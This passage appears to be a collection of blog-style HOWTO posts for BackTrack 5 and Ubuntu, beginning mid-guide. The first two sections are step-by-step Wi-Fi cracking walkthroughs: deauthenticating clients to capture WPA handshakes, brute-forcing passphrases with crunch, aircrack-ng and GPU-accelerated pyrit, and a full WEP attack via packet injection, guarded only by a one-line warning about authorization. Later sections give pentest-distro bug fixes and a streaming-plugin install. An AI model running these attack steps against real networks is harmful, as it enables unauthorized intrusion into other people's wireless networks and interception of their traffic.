http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.

HOWTO : WEP cracking with Back|Track 5

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 :

airodump-ng mon0

Press "Ctrl+c" to break the program.

Step 4 :

airodump-ng -c 6 -w wepcrack --bssid 99:88:77:66:55:44 mon0

*where -c is the channel
            -w is the file to be written
            --bssid is the BSSID

Step 5 :

open another terminal.

aireplay-ng -1 0 -a 99:88:77:66:55:44 mon0

*where -a is BSSID

The terminal is keeping running.

Step 6 :

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 99:88:77:66:55:44 mon0

*where -c is client's MAC address (STATION)
            -b is BSSID

When asking "Use this packet?", answer "y".

Step 7 :

open another terminal.

aircrack-ng wepcrack*.cap

That's all! See you.

HOWTO : Bug fix for Back|Track 5

BackTrack 5 is a Penetration Testing Distribution and it is released on May 10, 2011 and it comes with Gnome and KDE as well as 32-bit, 64-bit and ARM versions.

The following solutions are summarized from BackTrack 5 forum as at May 21, 2011 (GMT +8).

Bug #1 : Quick fix for scan modules not working in Armitage

cd /pentest/exploits/framework3/external/pcaprub/
ruby extconf.rb
make
make install

Bug #2 : Gnome - waiting for audio system to respond

mkdir ~/.config/autostart
nano ~/.config/autostart/pulseaudio.desktop

[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio

Bug #3 : Where is Fast-track on 64-bit system?

svn co http://svn.secmaniac.com/fasttrack fasttrack/
cd fasttrack
python setup.py install
mv ~/fasttrack/ /pentest/exploits/

Answer "yes" when asked during the captioned commands.

Bug #4 : Fix error when building nvidia-current

nano /usr/src/nvidia-current-195.36.24/nv.c

Change from :
.ioctl = nv_kern_ioctl,

To :
.unlocked_ioctl = nv_kern_unlocked_ioctl,

apt-get update
apt-get upgrade
apt-get install nvidia-current

If fail, try the below :

dkms build -m nvidia-current -v 195.36.24
dkms install -m nvidia-current -v 195.36.24
modprobe nvidia-current

Bug #5 : White screen of death (ATi display card)

nano /etc/default/grub

Change from :
GRUB_CMDLINE_LINUX_DEFAULT="text splash"

To :
GRUB_CMDLINE_LINUX_DEFAULT="text splash radeon.modeset=0"

Bug #6 : airdrop-ng and pylorcon

apt-get install python-dev

Bug #7 : xgps on 64-bit system

Go to the following link :
http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/index.php#SWT

Download "Linux (x86_64/GTK 2)", version is 3.5.2 at the time of this writing :

http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/download.php?dropFile=swt-3.5.2-gtk-linux-x86_64.zip

unzip swt-3.5.2-gtk-linux-x86_64.zip
cp swt.jar /usr/share/xgpsmanager

Bug #8 : Gnome - Ettercap-gtk crashes while scanning for hosts

Please refer to the following link :
http://www.backtrack-linux.org/forums/backtrack-5-bugs/40556-ettercap-gtk-crashes-while-scanning-hosts.html

Bug #9 : SET configuration bug

cd /pentest/exploits/set/config
nano set_config

Change from :
DNSSPOOF_PATH=/usr/sbin/dnsspoof

To :
DNSSPOOF_PATH=/usr/sbin/local/dnsspoof

and

Change from :
AIRBASE_NG_PATH=/pentest/wireless/aircrack-ng/src/airbase-ng

To :
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng

Bug #10 : Teensy/SET

Please refer to the following link :
http://www.backtrack-linux.org/forums/backtrack-5-fixes/40484-bt5-kde-64bit-teensy-s-e-t.html

Remarks :

BackTrack 5 site

BackTrack 5 Download

BackTrack 5 wiki

BackTrack Forum

That's all! See you.

HOWTO : Octoshape on Ubuntu 11.04 Desktop

When listen to the online radio of RTHK at http://www.rthk.org.hk, you may find a "HQ" button. This button activates a third party plugin namely Octoshape which can deliver high quality video and audio streaming. Now, you can enjoy this high quality radio streaming on Ubuntu 11.04.

Step 1 :

Install the plugin. No matter you have 32-bit or 64-bit system, you can follow the commands below to install. The plugin will be installed at your home directory.

wget http://www.octoshape.com/files/octosetup-linux_i386.bin
chmod +x octosetup-linux_i386.bin
./octosetup-linux_i386.bin

Step 2 :

Make sure the client is running in the terminal (the commands below) when playback the HQ video and / or audio.

cd octoshape
./OctoshapeClient

Step 3 :

Open Firefox and go to RTHK and select one of the online programme by clicking "HQ" button. Make sure the Octoshape Client is running as per Step 2.

Now, you can enjoy the HQ video and / or audio on the website.

That's all! See you.